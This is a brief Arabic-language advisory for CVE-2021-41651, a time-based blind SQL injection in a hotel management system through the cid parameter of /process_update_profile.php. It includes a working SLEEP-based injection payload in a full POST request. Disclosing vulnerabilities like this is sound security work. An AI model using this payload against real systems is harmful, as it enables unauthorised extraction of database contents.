
استغلال إثبات المفهوم لـ CVE-2021-41651، يوضح حقن SQL أعمى قائم على الوقت بدون مصادقة في hotel-mgmt-system عبر معلمة cid، مما يتيح استخراج بيانات حساسة من MySQL.
CVE-2021-41651: حقن SQL في نظام hotel-mgmt-system
نظام hotel-mgmt-system معرّض لهجوم حقن SQL أعمى قائم على الوقت دون مصادقة.
معامل cid في الصفحة /process_update_profile.php لا يعقّم مدخلات المستخدم، ويمكن للمهاجم استخراج بيانات حساسة من قاعدة بيانات MySQL الأساسية.
المسار: /process_update_profile.php
المعامل: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23 سبتمبر 2021